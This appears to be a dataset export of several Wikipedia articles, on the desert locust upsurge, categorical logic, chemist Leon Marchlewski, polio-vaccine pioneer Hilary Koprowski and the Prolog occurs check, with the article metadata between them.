Ethiopia and Somalia that led to another invasion of Kenya in December 2020, which was eventually brought under control by spring 2021. Again, unexpected rains fell in late April and early May, this time further north that allowed substantial breeding to occur in eastern Ethiopia and northern Somalia in May and June 2021. New swarms formed in June and July that moved to northeast Ethiopia for a generation of breeding that could not be addressed due to conflict and insecurity, which prolonged the upsurge in the Horn of Africa. The upsurge was finally brought under control by early 2022 as a result of successful and intensive control operations in northern Somalia and poor rainfall. there are no locust crises anywhere in the world but swarms are expected in October in the Sahel, Yemen and on the India–Pakistan border. In southwest Asia, the upsurge was brought under control much earlier because of a massive effort undertaken by India and Pakistan along both sides of their common border during the summer of 2020 that followed from earlier control operations during the spring of 2019 and 2020 by Iran and during the summer of 2019 by Pakistan and India. In June 2020, Cyclone Nisarga helped spread swarms across the northern states of India where a few reached the Himalayan foothills in Nepal. In response to the upsurge, the Director-General of FAO declared a Level 3 corporate-wide emergency, the highest level in the UN system, on 17 January 2020 and appealed for immediate international assistance to rapidly upscale monitoring and control activities in the Horn of Africa. One month later, Somalia declared a state of emergency. Similarly, Pakistan also declared a state of emergency. The UN continued to warn that the Horn of Africa was facing a dangerous situation. Fortunately, the international community responded quickly and generously despite other urgent situations such as COVID-19, and the $230 million appeal by FAO was fully funded. This allowed ground and aerial operations to treat of desert locust in the Horn of Africa and Yemen in 2020 and 2021. Up to 20 aircraft were deployed simultaneously, supported by hundreds of ground teams, and more than 1.4 million locations were surveyed. These collective efforts averted of crop losses, saved of milk production, and secured food for nearly 47 million people. The commercial value of the cereal and milk loss averted is estimated at $1.77 billion. FAO's Locust Watch contains the latest situation and forecasts as well as a full, detailed description of the recent upsurge. Pheromones The swarming pheromone guaiacol is produced in the gut of desert locusts by the breakdown of plant material. This process is undertaken by the gut bacterium Pantoea (Enterobacter) agglomerans. Guaiacol is one of the main components of the pheromones that cause locust swarming. Pheromones also accelerate S. gregaria development. Mahamat et al., 1993 find that an undifferentiated mix of several volatiles derived from the males of the species (including guaiacol) speed up the maturation process of both immature males and females. In research S. gregaria was one of the organisms examined by McNeill and Hoyle 1967 and found to have thinner muscle filaments than those before found. This contributed greatly to the development of the sliding filament theory. Westerman showed that exposure of S. gregaria males to a dose of X-rays during the S-phase (DNA synthesis phase) of spermatogonial mitoses and during the early stages of meiosis (leptotene-early zygotene stages) caused a significant increase in chiasmata frequency when scored at the later stages (diplotene-diakinesis stages) of meiosis. These results indicated that the formation of chiasmata is not an isolated event but the end product of an interrelated series of processes initiated at some earlier stage of meiosis. In culture Given the long history of desert locust, it is to be expected that references of the world's most dangerous migratory pest have crept into popular film and literature as well as many of the world's religions. Film Owing to the destructive habits of locusts, they have been a representation of famine in many Middle Eastern cultures, and are seen in the movies The Mummy (1999) and The Bible (1966). Religious books This species has been identified as one of the kosher species of locusts mentioned in Leviticus 11:22 by several rabbinical authorities among Middle Eastern Jewish communities. Literature 1939 - The Day of the Locust by Nathanael West. 1948 - Poka () () by Premendra Mitra. Gallery References Further reading AFROL News, Stronger efforts to fight West Africa's locusts Oct. 1, 2004 afrol News - Stronger efforts to fight West Africa's locusts Lindsey, R. 2002. Locust! OECD, The Desert Locust Outbreak in West Africa – Sept. 23, 2004 The Desert Locust Outbreak in West Africa – OECD Programme on biological control of locusts and grasshoppers (LUBILOSA) Wayback Machine Nature Magazine Article on combating desert locust through natural enemies Jahn, G. C. 1993. Supplementary environmental assessment of the Eritrean Locust Control Program. USAID, Washington DC. Wayback Machine Abdin, O., Stein, A., van Huis, A., 2001. Spatial distribution of the desert locust, Schistocerca gregaria, in the plains of the Red Sea coast of Sudan during the winter of 1999. van der Werf, W., Woldewahid, G., Abate, T., Butrous, M., Abdalla, O., Khidir, A. M., Mustafa, B., Magzoub, I., Abdin, O., Stein, A., & van Huis, A., 2002. Spatial distribution of the Desert Locust, Schistocerca gregaria, in the plains of the Red sea coast of Sudan during the winter of 1999. In Conference on agricultural and environmental statistical applications / F. Piersimoni, Rome, 5-7 June 2001 (pp. 167-171). Ceccato, P., K. Cressman, A. Giannini, S. Trzaska. 2007. The desert locust upsurge in West Africa (2003–2005): Information on the desert locust early warning system and the prospects for seasonal climate forecasting. International Journal of Pest Management, 53(1): 7-13. http://dx.doi.org/10.1080/09670870600968826 Chapuis, M.P., Plantamp, C., Blondin, L., Pagès, C., Lecoq, M., 2014. Demographic processes shaping genetic variation of the solitarious phase of the desert locust. Molecular Ecology 23 (7): 1749-1763. https://doi.org/10.1111/mec.12687 Cressman, K. 1996. Current methods of desert locust forecasting at FAO. Bulletin OEPP/EPPO Bulletin 26: 577–585. https://www.fao.org/ag/locusts/common/ecg/190/en/1996_EPPO_Cressman_Forecasting.pdf Cressman, K. 2008. The use of new technologies in Desert Locust early warning. Outlooks on Pest Management (April, 2008): 55–59. https://doi.org/10.1564/19apr03 Cressman, K. 2013. Role of remote sensing in desert locust early warning. J. Appl. Remote Sens. 7 (1): 075098; https://doi.org/10.1117/1.JRS.7.075098 Cressman, K. 2013. Climate change and locusts in the WANA Region. In M.V.K Sivakumar et al. (eds.), Climate Change and Food Security in West Asia and North Africa. (pp. 131–143). Netherlands: Springer. https://doi.org/10.1007/978-94-007-6751-5_7 Cressman, K. 2016. Desert Locust. In: J.F. Shroder, R. Sivanpillai (eds.), Biological and Environmental Hazards, Risks, and Disasters (pp. 87–105). USA: Elsevier. https://www.fao.org/ag/locusts/common/ecg/190/en/1512_Bio_hazard_book_chapter.pdf Dinku, T., Ceccato, P., Cressman, K., and Connor, S.J. 2010. Evaluating detection skills of satellite rainfall estimates over Desert Locust recession regions. J Applied Meteorology and Climatology 49 (6): 1322-1332. https://doi.org/10.1175/2010JAMC2281.1 Gay, P.-E., Lecoq, M., Piou, C., 2018. Improving preventive locust management: insights from a multi-agent model. Pest Management Science 74(1):46-58. https://doi.org/10.1002/ps.4648 Gay, P.-E., Lecoq, M., Piou, C., 2019. The limitations of locust preventive management faced with spatial uncertainty: exploration with a multi-agent model. Pest Management Science 76: 1094-1102. https://doi.org/10.1002/ps.5621 Gay, P.E., Trumper, E., Lecoq, M., Piou, C. 2021. Importance of field knowledge and experience to improve pest locust management. Pest Management Science. https://doi.org/10.1002/ps.6587 Guershon, M. & A. Ayali, 2012. Innate phase behavior in the desert locust, Schistocerca gregaria. Insect Science 19(6): 649-656. https://doi.org/10.1111/j.1744-7917.2012.01518.x Kayalto M., Idrissi Hassani M., Lecoq M., Gay P.E., Piou C., 2020. Cartographie des zones de reproduction et de grégarisation du criquet pèlerin au Tchad. Cahiers Agricultures 29:14 https://doi.org/10.1051/cagri/2020011 Lazar, M., Piou, C., Doumandji-Mitiche, B., Lecoq, M., 2016. Importance of solitarious Desert locust population dynamics: lessons from historical survey data in Algeria. Entomologia Experimentalis et Applicata 161:168-180. https://doi.org/10.1111/eea.12505 Lecoq, M., 1999. Projet de restructuration des organismes chargés de la surveillance et de la lutte contre le criquet pèlerin en région occidentale. Justifications et propositions [Project for the restructuring of the organizations responsible for monitoring and control of the desert locust in the Western Region. Justifications and proposals] . Food and Agriculture Organisation of the United Nations (FAO), Rome. 36 p. http://dx.doi.org/10.13140/RG.2.2.36765.95203 Lecoq, M., 2001. Recent progress in Desert and Migratory Locust management in Africa. Are preventive actions possible ?Journal of Orthoptera Research 10(2) : 277-29. https://doi.org/10.1665/1082-6467(2001)010%5B0277:RPIDAM%5D2.0.CO;2 Lecoq, M., 2005. Desert locust management: from ecology to anthropology. Journal of Orthoptera Research 14(2):179-186. https://doi.org/10.1665/1082-6467(2005)14%5B179:DLMFET%5D2.0.CO;2 Lecoq, M., 2019. Desert Locust Schistocerca gregaria (Forskål, 1775) (Acrididae). In: Lecoq M., Zhang L. Sc. Ed. Encyclopedia of Pest Orthoptera of the World, China Agricultural University Press, Beijing. Pp. 204-212 Lecoq, M., Cease, A., 2022. What have we learned after millennia of locust invasions? Agronomy 12, 472. https://doi.org/10.3390/agronomy12020472 Liu, J., Lecoq, M., Zhang, L., 2021. Desert locust stopped by Tibetan highlands during the 2020 upsurge. Agronomy 11, 2287. https://doi.org/10.3390/agronomy11112287 Magor, J. I., Lecoq, M., Hunter, D.M. 2008. Preventive control and Desert Locust plagues. Crop Protection 27 :1527-1533. https://doi.org/10.1016/j.cropro.2008.08.006 Meynard, C., Gay, P.-E., Lecoq, M., Foucart, A., Piou, C., Chapuis, M.P., 2017. Climate-driven geographic distribution of the desert locust during recession periods: Subspecies' niche differentiation and relative risks under scenarios of climate change. Global Change Biology 23(11) https://doi.org/10.1111/gcb.13739 Meynard, C.N., Lecoq, M., Chapuis, M.P., Piou, C., 2020. On the relative role of climate change and management in the current Desert Locust outbreak in East Africa. Global Change Biology 26:3753–3755. https://doi.org/10.1111/gcb.15137 Pekel, J., Ceccato, P., Vancutsem, C., Cressman, K., Vanbogaert, E. and Defourny, P. 2010. Development and application of multi-temporal colorimetric transformation to monitor vegetation in the Desert Locust habitat. IEEE J. of Selected Topics in Applied Earth Observations and Remote Sensing 4 (2): 318-326. Piou, C., Gay, P.-E., Benahi, A.S., Ould Babah Ebbe, M.A., Chihrane, J., Ghaout, S., Cisse, S., Diakite, F., Lazar, M., Cressman, K., Merlin, O., Escorihuela, M.J., 2019. Soil moisture from remote sensing to forecast desert locust presence. Journal of Applied Ecology 2019:1–10. https://doi.org/10.1111/1365-2664.13323 Piou, C., Jaavar Bacar, M., Babah Ebbe, M.A.O., Chihrane, J., Ghaout, S., Cisse, S., Lecoq, M., Ben Halima, T. 2017. Mapping the spatiotemporal distributions of the Desert Locust in Mauritania and Morocco to improve preventive management. Basic and Applied Ecology 25:37-47. https://doi.org/10.1016/j.baae.2017.10.002 Piou, C., Lebourgeois, V., Ahmed Salem Benahi, Bonnal, V., Mohamed El Hacen Jaavar, Lecoq, M., Vassal, J.M., 2013. Coupling historical prospection data and a remote-sensing vegetation index for the preventative control of Desert Locust. Basic and Applied Ecology 14:593-604. https://doi.org/10.1016/j.baae.2013.08.007 Showler, A.T., Lecoq, M. 2021. Incidence and ramifications of armed conflict in countries with major desert locust breeding areas. Agronomy 11, 114 https://doi.org/10.3390/agronomy11010114 Showler, A.T., Ould Babah Ebbe, M.A., Lecoq, M., Maeno, K.O., 2021. Early intervention against desert locusts: Current proactive approach and the prospect of sustainable outbreak prevention Agronomy 11, 312. https://doi.org/10.3390/agronomy11020312 Stefanski, R. and K. Cressman. 2015. Weather and Desert Locust. World Meteorological Organization, Geneva, Switzerland. Sultana, R., Samejo, A.A., Kumar, S., Soomro, S., Lecoq, M. 2021. The 2019-2020 upsurge of the desert locust and its impact in Pakistan. Journal of Orthoptera Research 30(2): 145–154. https://doi.org/10.3897/jor.30.65971 Symmons, P. & A. van Huis, 1997. Desert Locust Control campaign studies: operations guidebook. Wageningen University. 167 pp. & CD-Rom, 19 floppy disks. Symmons, P.M. and K. Cressman. 2001. Desert Locust Guidelines: I. Survey. Food and Agriculture Organization of the United Nations, Rome, Italy. Therville, C., Anderies, J.M., Lecoq, M., Cease, A. 2021. Locusts and People: Integrating the social sciences in sustainable locust management. Agronomy 11, 951. https://doi.org/10.3390/agronomy11050951 Van Huis, A. 1994. Desert locust control with existing techniques: an evaluation of strategies. Proceedings of the Seminar held in Wageningen, the Netherlands, 6–11 December 1993. 132 pp. . Van Huis, A. 1995. Desert locust plagues. Endeavour, 19(3): 118–124. Van Huis, A. 1997. Can we prevent desert locust plagues? In: New strategies in locust control (Eds.: S. Krall, R. Preveling and D.B. Diallo), pp. 453–459. Birkhäuser Verlag, Basel. 522 pp. Werf, W. van der, G. Woldewahid, T. Abate, M. Butrous, O. Abdalla, A.M. Khidir, B. Mustafa, I. Magzoub, O. Vallebona C, Genesio L, Crisci A, Pasqui M, Di Vecchia A, Maracchi G (2008). Large-scale climatic patterns forcing desert locust upsurges in West Africa. CLIMATE RESEARCH (2008) 37:35–41. . https://www.int-res.com/abstracts/cr/v37/n1/p35-41/ Waldner, F., Defourny, P., Babah Ebbe, M. A., and Cressman, K. 2015. Operational Monitoring of the Desert Locust Habitat with Earth Observation: An Assessment. Int. J. Geo-Inf. 4 (1): 2379-2400 https://doi.org/10.3390/ijgi4042379 Walford, G. F. 1963. Arabian Locust Hunter. London, Robert Hale. Zhang, L., Lecoq, M., Latchininsky, A., Hunter, D., 2019. Locust and grasshopper management. Annual Review of Entomology 64(1):15-34. https://doi.org/10.1146/annurev-ento-011118-112500 External links Desert Locust crisis in the Horn of Africa - FAO Website FAO Locust Watch site Lubilosa site Delivery systems Why Locusts Swarm: A Study Finds 'Tipping Point' Columbia University IRI Climate and Desert Locust Desert Locust Meteorological Monitoring, at Sahel Resources Cultivation of locusts for the pet trade Modelling insect wings using the finite element method Locusts Orthoptera of Africa Insects described in 1775 Agricultural pest insects Food security Animal migration Orthoptera of Asia Insect pests of millets
Desert locust
[ "Biology" ]
10,214
[ "Ethology", "Behavior", "Animal migration" ]
1,063,799
https://en.wikipedia.org/wiki/Categorical%20logic
Categorical logic is the branch of mathematics in which tools and concepts from category theory are applied to the study of mathematical logic. It is also notable for its connections to theoretical computer science. In broad terms, categorical logic represents both syntax and semantics by a category, and an interpretation by a functor. The categorical framework provides a rich conceptual background for logical and type-theoretic constructions. The subject has been recognisable in these terms since around 1970. Overview There are three important themes in the categorical approach to logic: Categorical semantics Categorical logic introduces the notion of structure valued in a category C with the classical model theoretic notion of a structure appearing in the particular case where C is the category of sets and functions. This notion has proven useful when the set-theoretic notion of a model lacks generality and/or is inconvenient. R.A.G. Seely's modeling of various impredicative theories, such as System F, is an example of the usefulness of categorical semantics. It was found that the connectives of pre-categorical logic were more clearly understood using the concept of adjoint functor, and that the quantifiers were also best understood using adjoint functors. Internal languages This can be seen as a formalization and generalization of proof by diagram chasing. One defines a suitable internal language naming relevant constituents of a category, and then applies categorical semantics to turn assertions in a logic over the internal language into corresponding categorical statements. This has been most successful in the theory of toposes, where the internal language of a topos together with the semantics of intuitionistic higher-order logic in a topos enables one to reason about the objects and morphisms of a topos as if they were sets and functions. This has been successful in dealing with toposes that have "sets" with properties incompatible with classical logic. A prime example is Dana Scott's model of untyped lambda calculus in terms of objects that retract onto their own function space. Another is the Moggi–Hyland model of system F by an internal full subcategory of the effective topos of Martin Hyland. Term model constructions In many cases, the categorical semantics of a logic provide a basis for establishing a correspondence between theories in the logic and instances of an appropriate kind of category. A classic example is the correspondence between theories of βη-equational logic over simply typed lambda calculus and Cartesian closed categories. Categories arising from theories via term model constructions can usually be characterized up to equivalence by a suitable universal property. This has enabled proofs of meta-theoretical properties of some logics by means of an appropriate categorical algebra. For instance, Freyd gave a proof of the disjunction and existence properties of intuitionistic logic this way. These three themes are related. The categorical semantics of a logic consists in describing a category of structured categories that is related to the category of theories in that logic by an adjunction, where the two functors in the adjunction give the internal language of a structured category on the one hand, and the term model of a theory on the other. See also History of topos theory Coherent topos Notes References Books Seminal papers Further reading Fairly accessible introduction, but somewhat dated. The categorical approach to higher-order logics over polymorphic and dependent types was developed largely after this book was published. A comprehensive monograph written by a computer scientist; it covers both first-order and higher-order logics, and also polymorphic and dependent types. The focus is on fibred category as universal tool in categorical logic, which is necessary in dealing with polymorphic and dependent types. Version available online at John Bell's homepage. A preliminary version. Systems of formal logic Theoretical computer science
Categorical logic
[ "Mathematics" ]
785
[ "Mathematical structures", "Categorical logic", "Theoretical computer science", "Applied mathematics", "Mathematical logic", "Category theory" ]
1,063,811
https://en.wikipedia.org/wiki/Leon%20Marchlewski
Leon Paweł Teodor Marchlewski (Polish: ; 15 December 1869 – 16 January 1946) was a Polish chemist, the first Director and Honorary Member of the Polish Chemical Society. He was one of the founders in the field of chlorophyll chemistry and a precursor of clinical chemistry. Life and career He was born in 1869 in Włocławek, Congress Poland to father Józef Marchlewski, a merchant, and mother Emilia (née Rückersfeldt), a governess. His older brother was the communist activist Julian Marchlewski. In 1888, he went to Zürich and studied chemistry at the ETH Zurich. In 1890, he became an assistant to Professor Georg Lunge. After two years, he earned his doctoral degree. He subsequently went to Kersel near Manchester where he became an assistant of Edward Schunck. In this period he collaborated with Marceli Nencki and conducted research on the chemical affinity of dyes of the animal and plant world. Between 1896 and 1897, he was on a scientific scholarship granted for his research in the field of organic chemistry from the Kraków-based Academy of Learning (Polish: Akademia Umiejętności, AU). He also taught organic chemistry at the Institute of Science and Technology of the University of Manchester. In 1900, he returned to Poland and obtained his habilitation on the basis of his thesis Die Chemie des Chlorophylls and lecture titled Dzisiejszy stan teoryi tautomeryi. In the years 1900–1906, he worked as a senior inspector at the General Department of Food Research in Kraków headed by Odo Bujwid. He also became a professor at the Jagiellonian University and served as the university's rector between 1926–1927 and 1927–1928. From 1906 to 1939 he was Head of the Institute of Medicinal Chemistry. In 1917–1919, he established the National Scientific Institute of Agricultural Economy in Puławy. He was the first director of the Polish Chemical Society and served as the first director of YMCA in Poland. His scientific work mostly focused on the areas of organic, inorganic and analytic chemistry as well as biochemistry. His scientific achievements include research on chlorophyll and the blood pigment hemoglobin, which demonstrated the similarity of chemical structures in plants and animals, indicating a common origin. He was nominated for the Nobel Prize in Physiology or Medicine in 1913 and 1914. The illustration on the right is of his diplomatic passport he used in 1927 to attend an international conference on chemistry in Paris. Marchlewski was also a long-time political activist in the Polish peasant movement. In December 1945, he became a member of the National Council, representing the Polish People's Party. He died several days later and was buried at the Rakowicki Cemetery. Honours Commander's Cross of the Order of Polonia Restituta (1925) Gold Cross of Merit (1936) Commander's Cross of the Order of Dannebrog 2nd Class See also List of Polish chemists Timeline of Polish science and technology References External links 1869 births 1946 deaths Burials at Rakowicki Cemetery People from Włocławek Polish senators Polish chemists Chemical pathologists Members of the Lwów Scientific Society Rectors of the Jagiellonian University Commanders of the Order of Polonia Restituta People from Congress Poland Commanders of the Order of the Dannebrog ETH Zurich alumni
Leon Marchlewski
[ "Chemistry" ]
703
[ "Chemical pathology", "Chemical pathologists" ]
1,063,891
https://en.wikipedia.org/wiki/Hilary%20Koprowski
Hilary Koprowski (5 December 191611 April 2013) was a Polish virologist and immunologist active in the United States who demonstrated the world's first effective live polio vaccine. He authored or co-authored over 875 scientific papers and co-edited several scientific journals. Koprowski received many academic honors and national decorations, including the Belgian Order of the Lion, the French Order of Merit and Legion of Honour, Finland's Order of the Lion, and the Order of Merit of the Republic of Poland. Koprowski was the target of accusations in the press related to the "oral polio vaccine AIDS hypothesis", which posited that the AIDS pandemic originated from live polio vaccines such as Koprowski's. This allegation was refuted by evidence showing that the human immunodeficiency virus was introduced to humans before his polio-vaccine trials were conducted in Africa. The case was settled out of court with a formal apology from Rolling Stone magazine. Life Hilary Koprowski was born in Warsaw to an educated, assimilated Jewish family. His parents met in 1906 when Paweł Koprowski (1882–1957) was serving in the Imperial Russian Army, and moved to Warsaw soon after their marriage in 1912. His mother Sonia (née Berland; 1883–1967), was a dentist from Berdichev. Hilary Koprowski attended Warsaw's Mikołaj Rej Secondary School, and from age twelve he took piano lessons at the Warsaw Conservatory. He received a medical degree from Warsaw University in 1939. He also received music degrees from the Warsaw Conservatory and, in 1940, from the Santa Cecilia Conservatory in Rome. He adopted scientific research as his life's work, but never gave up music and composed several musical works. In July 1938, while in medical school, Koprowski married Irena Grasberg. In 1939, after Germany's invasion of Poland, Koprowski and his wife, likewise a physician, fled the country, using Koprowski family business connections in Manchester, England. Hilary went to Rome, where he spent a year studying piano at the Santa Cecilia Conservatory; while Irena went to France, where she gave birth to their first child, Claude Koprowski, and worked as an attending physician at a psychiatric hospital. As the invasion of France loomed in 1940, Irena and the infant escaped from France via Spain and Portugal —where the Koprowski family reunited — to Brazil, where Koprowski worked in Rio de Janeiro for the Rockefeller Foundation. His field of research for several years was finding a live-virus vaccine against yellow fever. After World War II the Koprowskis settled in Pearl River, New York, where Hilary was hired as a researcher for Lederle Laboratories, the pharmaceutical division of American Cyanamid. Here he began his polio experiments, which ultimately led to the creation of the first oral polio vaccine. Koprowski served as director of the Wistar Institute, 1957–91, during which period Wistar achieved international recognition for its vaccine research and became a National Cancer Institute Cancer Center. Koprowski died on April 11, 2013, aged 96, in Wynnewood, near Philadelphia, Pennsylvania, of pneumonia. He and his wife are buried at West Laurel Hill Cemetery, Southlawn Section, Lot 782, Bala Cynwyd, Pennsylvania. Hilary Koprowski and his late wife had two sons. Their first child Claude (born in Paris, 1940), who died in 2020, was a retired physician. Their second son, Christopher (born 1951) is a retired physician certified in two specialties, neurology and radio-oncology. He is also the former chair of the department of radiation oncology at Christiana Hospital in Delaware. Polio vaccine While at Lederle Laboratories, Koprowski created an early polio vaccine, based on an orally administered attenuated polio virus. In researching a potential polio vaccine, he had focused on live viruses that were attenuated (rendered non-virulent) rather than on killed viruses (the latter became the basis for the injected vaccine subsequently developed by Jonas Salk). Koprowski viewed the live vaccine as more powerful, since it entered the intestinal tract directly and could provide lifelong immunity, whereas the Salk vaccine required booster shots. Also, administering a vaccine by mouth is easy, whereas an injection requires medical facilities and is more expensive. Koprowski developed his polio vaccine by attenuating the virus in brain cells of a cotton rat, Sigmodon hispidus, a New World species that is susceptible to polio. He administered the vaccine to himself in January 1948 and, on 27 February 1950, to 20 children at Letchworth Village, a home for disabled persons in Rockland County, New York. Seventeen of the 20 children developed antibodies to polio virus — the other three apparently already had antibodies — and none of the children developed complications. Within 10 years, the vaccine was being used on four continents. Albert Sabin's early work with attenuated-live-virus polio vaccine was developed from attenuated polio virus that Sabin had received from Koprowski. Rabies vaccine In addition to his work on the polio vaccine, Koprowski (along with Stanley Plotkin and Tadeusz Wiktor) did significant work on an improved vaccine against rabies. The group developed the HDCV rabies vaccine in the 1960s at the Wistar Institute. It was licensed for use in the United States in 1980. Affiliations Koprowski was president of Biotechnology Foundation Laboratories, Inc, and head of the Center for Neurovirology at Thomas Jefferson University. In 2006 he was awarded a record 50th grant from the National Institutes of Health. He authored or co-authored over 875 scientific papers and co-edited several scientific journals. He served as a consultant to the World Health Organization and the Pan American Health Organization. Honors and legacy Koprowski received many honorary degrees, academic honors, and national decorations, including the Order of the Lion from the King of Belgium, the French Order of Merit for Research and Invention, a Fulbright Scholarship, and appointment as Alexander von Humboldt Professor at the Max Planck Institute for Biochemistry in Munich. In 1989 he received the San Marino Award for Medicine and the Nicolaus Copernicus Medal of the Polish Academy of Sciences in Warsaw. Koprowski received numerous honors in Philadelphia, including the Philadelphia Cancer Research Award, the John Scott Award and, in May 1990, the most prestigious honor of his home city, the Philadelphia Award. He was a Fellow of the College of Physicians of Philadelphia, which in 1959 presented him with its Alvarenga Prize. Koprowski was a member of the National Academy of Sciences, the American Academy of Arts and Sciences, the New York Academy of Sciences, and the Polish Institute of Arts and Sciences of America. He held foreign membership in the Yugoslav Academy of Sciences and Arts, the Polish Academy of Sciences, the Russian Academy of Medical Sciences, and the Finnish Society of Sciences and Letters. On June 3, 1983, Koprowski received an honorary doctorate from the Faculty of Medicine at Uppsala University, Sweden. On 22 March 1995, Koprowski was made a Commander of Finland's Order of the Lion by Finland's president. On 13 March 1997 he received the Legion d'Honneur from the French government. On 29 September 1998 he was presented by Poland's president with the Grand Cross of Poland's Order of Merit. On 25 February 2000 Koprowski was honored with a reception at Philadelphia's Thomas Jefferson University celebrating the 50th anniversary of the first administration of his oral polio vaccine. At the reception, he received commendations from the United States Senate, the Pennsylvania Senate, and Pennsylvania Governor Tom Ridge. On 13 September 2004, Koprowski was presented with the Pioneer in NeuroVirology Award by the International Society for NeuroVirology at the 6th International Symposium on NeuroVirology held in Sardinia. On 1 May 2007, Koprowski was awarded the Albert Sabin Gold Medal by the Sabin Vaccine Institute in Baltimore, Maryland. In 2014 Drexel University established the Hilary Koprowski Prize in Neurovirology in honor of Dr. Koprowski's contributions to the field of neurovirology. The prize is awarded annually in conjunction with the International Symposium on Molecular Medicine and Infectious Disease, which is sponsored by the Institute for Molecular Medicine and Infectious Disease (IMMID) within the Drexel University College of Medicine. During the Symposium, the prize recipient is asked to deliver an honorary lecture. AIDS accusation British journalist Edward Hooper publicized a hypothesis that Koprowski's research into a polio vaccine in the Belgian Congo in the late 1950s might have caused AIDS. The OPV AIDS hypothesis has, however, been rejected by the medical community and is contradicted by at least one article in the journal Nature, which claims the HIV-1 group M virus originated in Africa 30 years before the OPV trials were conducted. The journal Science refuted Hooper's claims, writing: "[I]t can be stated with almost complete certainty that the large polio vaccine trial... was not the origin of AIDS." Koprowski rejected the claim, based on his own analysis. In a separate court case, he won a regretful clarification, and a symbolic award of $1 in damages, in a defamation suit against Rolling Stone, which had published an article repeating similar false allegations. A concurrent defamation lawsuit that Koprowski brought against the Associated Press was settled several years later; the settlement's terms were not publicly disclosed. Koprowski's original reports from 1960 to 1961 detailing part of his vaccination campaign in the Belgian Congo are available online from the World Health Organization. See also Albert Sabin Discredited HIV/AIDS origins theories Jonas Salk List of Polish people Poles Polio vaccine Wistar Institute Notes References Roger Vaughan, Listen to the Music: The Life of Hilary Koprowski, Berlin, Springer, 2000; David Oshinsky, Polio: An American Story, Oxford University Press, 2005; 2007 Albert B. Sabin Gold Medal awarded to Hilary Koprowski (booklet/PDF file); accessed 21 April 2015. Directory [of] PIASA Members, 1999, New York City, Polish Institute of Arts and Sciences of America, 1999. External links Hilary Koprowski (2012), Polio Vaccine. Official site. Internet Archive. Stacey Burling (April 14, 2013), "Hilary Koprowski, polio vaccine pioneer, dead at 96". Philly.com, Internet Archive. New York Times Obituary (April 21, 2013), "Hilary Koprowski dies at 96." Accademia Nazionale di Santa Cecilia alumni American immunologists American medical researchers American people of Polish-Jewish descent American virologists Chopin University of Music alumni Commanders of the Order of the Lion of Finland Deaths from pneumonia in Pennsylvania Grand Crosses of the Order of Merit of the Republic of Poland Members of the Polish Academy of Sciences Members of the United States National Academy of Sciences Polio Polish emigrants to the United States Polish immunologists Rockefeller Foundation people University of Warsaw alumni Vaccinologists 1916 births 2013 deaths Polish recipients of the Legion of Honour
Hilary Koprowski
[ "Biology" ]
2,313
[ "Vaccination", "Vaccinologists" ]
1,063,946
https://en.wikipedia.org/wiki/Occurs%20check
In computer science, the occurs check is a part of algorithms for syntactic unification. It causes unification of a variable V and a structure S to fail if S contains V. Application in theorem proving In theorem proving, unification without the occurs check can lead to unsound inference. For example, the Prolog goal will succeed, binding X to a cyclic structure which has no counterpart in the Herbrand universe. As another example, without occurs-check, a resolution proof can be found for the non-theorem : the negation of that formula has the conjunctive normal form , with and denoting the Skolem function for the first and second existential quantifier, respectively. Without occurs check, the literals and are unifiable, producing the refuting empty clause. Rational tree unification Prolog implementations usually omit the occurs check for reasons of efficiency, which can lead to circular data structures and looping. By not performing the occurs check, the worst case complexity of unifying a term with term is reduced in many cases from to ; in the particular, frequent case of variable-term unifications, runtime shrinks to . Modern implementations, based on Colmerauer's Prolog II, use rational tree unification to avoid looping. However it is difficult to keep the complexity time linear in the presence of cyclic terms. Examples where Colmerauers algorithm becomes quadratic can be readily constructed, but refinement proposals exist. See image for an example run of the unification algorithm given in Unification (computer science)#A unification algorithm, trying to solve the goal , however without the occurs check rule (named "check" there); applying rule "eliminate" instead leads to a cyclic graph (i.e. an infinite term) in the last step. Sound unification ISO Prolog implementations have the built-in predicate unify_with_occurs_check/2 for sound unification but are free to use unsound or even looping algorithms when unification is invoked otherwise, provided the algorithm works correctly for all cases that are "not subject to occurs-check" (NSTO). The built-in acyclic_term/1 serves to check the finiteness of terms. Implementations offering sound unification for all unifications are Qu-Prolog and Strawberry Prolog and (optionally, via a runtime flag): XSB, SWI-Prolog, CxProlog, Tau Prolog, Trealla Prolog and Scryer Prolog. A variety of optimizations can render sound unification feasible for common cases. See also Notes References Automated theorem proving Logic programming Programming constructs Unification (computer science)
Occurs check
[ "Mathematics" ]
543
[ "Automated theorem proving", "Unification (computer science)", "Mathematical logic", "Mathematical objects", "Computational mathematics", "Equations" ]
1,063,953
https://en.wikipedia.org/wiki/Oaklisp
Oaklisp is a message based portable object-oriented Scheme developed by Kevin J. Lang and Barak A. Pearlmutter while Computer Science PhD students at Carnegie Mellon University. Oaklisp uses a superset of Scheme syntax. It is based on generic operations rather than functions, and features anonymous classes, multiple inheritance, a strong error system, setters and locators for operations, and a facility for dynamic binding. Version 1.2 includes an interface, bytecode compiler, run-time system and documentation. References External links Oaklisp homepage Scheme (programming language) implementations Object-oriented programming languages
Oaklisp
[ "Technology" ]
125
[ "Computing stubs", "Computer science", "Computer science stubs" ]
1,063,976
https://en.wikipedia.org/wiki/OBJ%20%28programming%20language%29
OBJ is a programming language family introduced by Joseph Goguen in 1976, and further worked on by Jose Meseguer. Overview It is a family of declarative "ultra high-level" languages. It features abstract types, generic modules, subsorts (subtypes with multiple inheritance), pattern-matching modulo equations, E-strategies (user control over laziness), module expressions (for combining modules), theories and views (for describing module interfaces) for the massively parallel RRM (rewrite rule machine). Members of the OBJ family of languages include CafeOBJ, Eqlog, FOOPS, Kumo, Maude, OBJ2, and OBJ3. OBJ2 OBJ2 is a programming language with Clear-like parametrised modules and a functional system based on equations. OBJ3 OBJ3 is a version of OBJ based on order-sorted rewriting. OBJ3 is agent-oriented and runs on Kyoto Common Lisp AKCL. See also Automated theorem proving Comparison of programming languages Formal methods References J. A. Goguen, Higher-Order Functions Considered Unnecessary for Higher-Order Programming. In Research Topics in Functional Programming (June 1990). pp. 309–351. "Principles of OBJ2", K. Futatsugi et al., 12th POPL, ACM 1985, pp. 52–66. External links The OBJ archive The OBJ family Information and OBJ3 manual, PostScript format Academic programming languages Functional languages Logic in computer science Formal specification languages Theorem proving software systems Term-rewriting programming languages
OBJ (programming language)
[ "Mathematics" ]
338
[ "Logic in computer science", "Automated theorem proving", "Mathematical logic", "Theorem proving software systems", "Mathematical software" ]
1,064,013
https://en.wikipedia.org/wiki/Object%20identifier
